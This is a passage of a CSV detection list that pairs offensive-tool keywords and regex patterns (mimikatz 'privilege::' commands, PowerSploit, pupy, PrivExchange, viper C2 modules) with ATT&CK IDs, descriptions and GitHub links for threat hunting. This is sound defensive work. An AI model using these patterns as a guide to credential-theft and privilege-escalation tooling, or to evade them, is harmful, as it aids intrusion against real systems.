T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*privcheck.cna*",".{0,1000}privcheck\.cna.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*privcheck32*",".{0,1000}privcheck32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivEditor.dll*",".{0,1000}PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*Privesc.psm1*",".{0,1000}Privesc\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Privesc.tests.ps1*",".{0,1000}Privesc\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*privesc_checker*",".{0,1000}privesc_checker.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*privesc_checker.py*",".{0,1000}privesc_checker\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*privesc_juicy_potato '*",".{0,1000}privesc_juicy_potato\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc_juicy_potato.py*",".{0,1000}privesc_juicy_potato\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc_powerup '*",".{0,1000}privesc_powerup\s\'.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc_powerup.py*",".{0,1000}privesc_powerup\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*privesc-check*",".{0,1000}privesc\-check.{0,1000}","offensive_tool_keyword","windows-privesc-check","privesc script checker - Windows-privesc-check is standalone executable that runs on Windows systems. It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases).","T1048 - T1059 - T1088 - T1208","TA0004 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pentestmonkey/windows-privesc-check","1","1","N/A","N/A","10","1455","327","2023-08-01T07:35:20Z","2015-03-22T13:39:38Z" "*PrivescCheck.ps1*",".{0,1000}PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*PrivescCheck_*.*",".{0,1000}PrivescCheck_.{0,1000}\..{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*PrivescCheckAsciiReport*",".{0,1000}PrivescCheckAsciiReport.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*PrivEscManager.cs*",".{0,1000}PrivEscManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*privexchange.py -d *",".{0,1000}privexchange\.py\s\-d\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*privexchange.py*",".{0,1000}privexchange\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*PrivExchange-master.zip*",".{0,1000}PrivExchange\-master\.zip.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*PrivFu-main.zip*",".{0,1000}PrivFu\-main\.zip.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*PrivFu-master*",".{0,1000}PrivFu\-master.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*privilege::backup*",".{0,1000}privilege\:\:backup.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::debug*",".{0,1000}privilege\:\:debug.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::driver*",".{0,1000}privilege\:\:driver.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::id*",".{0,1000}privilege\:\:id.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::name*",".{0,1000}privilege\:\:name.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::restore*",".{0,1000}privilege\:\:restore.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::security*",".{0,1000}privilege\:\:security.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::sysenv*",".{0,1000}privilege\:\:sysenv.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*privilege::tcb*",".{0,1000}privilege\:\:tcb.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*Privileged Accounts - Layers Analysis.txt*",".{0,1000}Privileged\sAccounts\s\-\sLayers\sAnalysis\.txt.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Final Report.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sFinal\sReport\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*Privileged Accounts Permissions - Irregular Accounts.csv*",".{0,1000}Privileged\sAccounts\sPermissions\s\-\sIrregular\sAccounts\.csv.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","AD Enumeration","7","8","764","144","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" "*PrivilegeEscalation*",".{0,1000}PrivilegeEscalation.{0,1000}","offensive_tool_keyword","PrivilegeEscalation","This program is a very short batch file which allows you to run anything with admin rights without prompting user could be related to other tools using privsec methods","T1548.001 - T1548.003 - T1548.008","TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/LouisVallat/PrivilegeEscalation","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PrivilegeEscalation_BypassUserAccountControl_Windows.py*",".{0,1000}PrivilegeEscalation_BypassUserAccountControl_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_EnumPatchExample_Windows.py*",".{0,1000}PrivilegeEscalation_EnumPatchExample_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_CVE_2021_40449\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_EfsPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_SweetPotato\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows.py*",".{0,1000}PrivilegeEscalation_ExploitationForPrivilegeEscalation_Windows\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*PrivilegeEscalation_ProcessInjection_Getsystem.py*",".{0,1000}PrivilegeEscalation_ProcessInjection_Getsystem\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Privileger.cpp*",".{0,1000}Privileger\.cpp.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privileger.exe*",".{0,1000}Privileger\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privileger-main.*",".{0,1000}Privileger\-main\..{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privilegerx64.exe*",".{0,1000}Privilegerx64\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*Privilegerx86.exe*",".{0,1000}Privilegerx86\.exe.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*PrivKit32*",".{0,1000}PrivKit32.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*PrivKit-main*",".{0,1000}PrivKit\-main.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*Probable-Wordlists*",".{0,1000}Probable\-Wordlists.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - 